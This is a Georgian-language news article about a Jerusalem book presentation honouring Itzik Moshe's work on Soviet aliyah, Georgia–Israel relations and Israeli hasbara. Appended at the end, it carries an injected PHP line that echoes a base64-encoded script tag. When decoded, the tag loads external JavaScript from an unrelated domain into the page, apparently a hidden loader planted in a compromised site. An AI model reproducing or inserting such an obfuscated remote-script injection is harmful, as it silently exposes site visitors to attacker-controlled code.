celsiusi
ავერსი შნაიდერი
იერუსალიმში, პოლიტიკური სიონიზმის ფუძემდებლის თეოდორ ჰერცელის საფლავზე ყვავილების მიტანით დაიწყო საზეიმო ცერემონია, რომელიც წიგნის „სიონიზმი დინების წინააღმდეგ“ პრეზენტაციას მიეძღვნა. 
 
წიგნი ებრაულ ენაზე ახლახან გამოიცა და მოგვითხრობს დიდი საბჭოთა ალიის ერთ-ერთი შემოქმედის იციკ მოშეს 30-წლიან საქმიანობის შესახებ სხვადასხვა ორგანიზაციის ხელმძღვანელის რანგში. წიგნის ქართული ვერსია გაისად გამოიცემა. დაგეგმილია, აგრეთვე მისი ინგლისურად თარგმნაც, ვინაიდან დიდია გამოცემაში თავმოყრილი თემებისადმი მსოფლიო ებრაელობის ინტერესი.
 
სიმბოლურია, რომ წიგნის წარდგენის ცერემონია სწორედ ჰერცელის საფლავთან ჩატარდა, სადაც, ტრადიციულად, პროტოკოლით არის გათვალისწინებული მსოფლიო ლიდერების მიერ ებრაელი ხალხის გამორჩეული შვილის სახელისთვის პატივის მიგება.
 
როგორც ისრაელის პრესა აღნიშნავს, ისრაელის პოლიტიკურმა და ანალიტიკურმა წრეებმა ერთხმად აღიარეს იციკ მოშეს განსაკუთრებული როლი თანამედროვე ისრაელისთვის ისეთ ეპოქალურ მოვლენაში, როგორიცაა საბჭოთა კავშირიდან ასიათასობით ებრაელის სამშობლოში დაბრუნება, აგრეთვე, ისრაელი-მსოფლიო ებრაელობა-საქართველოს ურთიერთობების ჩამოყალიბებასა და ისრაელის საერთაშორისო ჰასბარაში (საერთაშორისო ასპარეზზე ისრაელის წარმოდგენა). წიგნიც სწორედ ამ სამ თემას ეძღვნება.
 
 აღსანიშნავია, რომ გამოცემაში ცენტრალური ადგილი უკავია საქართველოს როლს დიდი ალიის დაწყებასა თუ მოგვიანებით ჰასბარას საერთაშორისო კამპანიას, რომელსაც სათავეში უდგას იციკ მოშეს მიერ  ქნესეთის წევრებთან თანამშრომლობით დაარსებული ორგანიზაცია „ისრაელის სახლი“.
 
წიგნის პრეზენტაციას დაესწრნენ ისრაელის მთავრობისა და ქნესეთის წევრები, მათ შორის შრომისა და სოციალური უზრუნველყოფის მინისტრი იციკ შმული, ქნესეთის იმიგრაციის, აბსორბციისა და დიასპორის საქმეთა კომიტეტის თავმჯდომარე დავიდ ბიტანი, ქნესეთის ყოფილი ვიცე-სპიკერი ხილიკ ბარი, სოხნუთისა და მსოფლიო სიონისტური ორგანიზაციის ხელმძღვანელობა, პოლიტიკური ელიტისა და საზოგადოების წარმომადგენლები. ღონისძიება მედიის ყურადღების ცენტრშიც მოექცა. ისრაელის პრესას მოყავს იციკ მოშეს მიერ პრეზენტაციაზე წარმოთქმული სიტყვები: „ებრაელმა ან უნდა იცხოვროს ისრაელში და შრომით და სისხლით დაიცვას სამშობლო; ან თუ ისრაელის გარეთ ცხოვრობს, დღემუდამ იშრომოს მისთვის. მესამე გზა ებრაელისთვის არ უნდა არსებობდეს“.
 
როგორც იციკ მოშე აცხადებს, ეს პრინციპი მორგებულია ქართველებზეც და საქართველოს ინტერესებზეც. ის გამოთქვამს წუხილს, რომ ბოლო 30 წლის განმავლობაში უფრო მეტის გაკეთება შეიძლებოდა ისრაელსა და მსოფლიო ებრაელობასთან საქართველოს კავშირების ჩამოყალიბებაში, თუმცა ახლაც შეიძლება მუშაობის გაძლიერება და ის პირადად მზადაა, თავისი წვლილი კვლავ შეიტანოს ამ საქმეში.
 
პრეზენტაციაზე იციკ მოშემ წარადგინა „ისრაელის სახლის“ 100 წარმომადგენლობის გეგმა, რომელიც უნდა გაიხსნას არა ისრაელის სახელმწიფოს ხარჯით, არამედ ებრაული შემოწირულობებით. წარმომადგენლობების საქმიანობა შეცვლის ისრაელის საგარეო პოლიტიკას ჰასბარას მიმართულებით.
ისრაელის მთავრობისა და პარლამენტის წევრების, აგრეთვე, მსოფლიო სიონისტური ორგანიზაციის ხელმძღვანელის იაკობ ხაგოელის თქმით, „ისრაელის სახლის“ წარმომადგენლობები გახდება მომავალი დიდი გეგმის საფუძველი. მანვე იციკ მოშეს ისრაელის სამსახურში 30-წლიან საქმიანობაზე ისაუბრა და აღნიშნა:
“უნდა გაბედო და იოცნებო და წახვიდე დინების წინააღმდეგ. ასეთი იყო ჰერცელი. ასეთია იციკ მოშეც. სრულად ვიღებ „ისრაელის სახლის“ კონცეფციას“
ნიშანდობლივია, რომ  მსოფლიო სიონისტური ორგანიზაციის ხელმძღვანელმა იაკობ ხაგოელმა გაეროს გენერალურ მდივანს მიმართა, დაისვას მსოფლიოში მზარდ ანტისემიტიზმთან ბრძოლის საკითხი. ამ საკითხს პრეზენტაციაზე გამოეხმაურა იციკ მოშე და აღნიშნა, რომ „ისრაელის სახლის“ ინიციატივით, მსოფლიო სიონისტური ორგანიზაციასა და საქართველოს ქართულ-ამერიკულ უნივერსიტეტს შორის მალე გაფორმდება ხელშეკრულება, რომლის თანახმად, უნივერსიტეტი გახდება ერთ-ერთი პირველი, სადაც დაიწყება ანტისემიტიზმის პრობლემის სწავლება. იციკ მოშემ დამსწრე საზოგადოებას გააცნო მსოფლიო სიონისტური ორგანიზაციის ხელმძღვანელის იაკობ ხაგოელისთვის ქართულ-ამერიკული უნივერსიტეტის ერთ-ერთი ხელმძღვანელის, პროფესორ ზაზა რუხაძის მიერ გაგზავნილი წერილი, რომელშიც ნათქვამია, რომ ვინაიდან ანტისემიტიზმი მსოფლიო პრობლემაა, იმის მიუხედავად, რომ ეს სენი საქართველოსთვის არ არის დამახასიათებელი, უნივერსიტეტმა გადაწყვიტა, იყოს პირველი რეგიონში და დაიწყოს ანტისემიტიზმის ისტორიის სწავლება.
 
პრეზენტაციაზე ითქვა, რომ იციკ მოშეს ხელმძღვანელობით, ივლისში საქართველოში ჩატარდება ისრაელის დღეები  და სწორედ ამ ღონისძიებების ფარგლებში მსოფლიო სიონისტური ორგანიზაციასა და ქართულ-ამერიკულ უნივერსიტეტს შორის გაფორმდება შესაბამისი მემორანდუმი. სიონისტური ორგანიზაციის ხელმძღვანელი თბილისში შეხვდება აგრეთვე სხვა 3 უნივერსიტეტის ხელმძღვანელობასაც, სადაც „ისრაელის სახლის“ მხარდაჭერით ისწავლება ჰოლოკოსტის ისტორია.
 
ღონისძიების შემდეგ იციკ მოშემ ევროპული ორგანიზაციებისგან მიიღო შეთავაზება, რომ წიგნის და „ისრაელის სახლის“ მიერ შემუშავებული ჰასბარას მოდელის პრეზენტაცია გაიმართოს ევროპაშიც, ისრაელის სხვა ორგანიზაციებსა და უნივერსიტეტებში.
 
1445
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");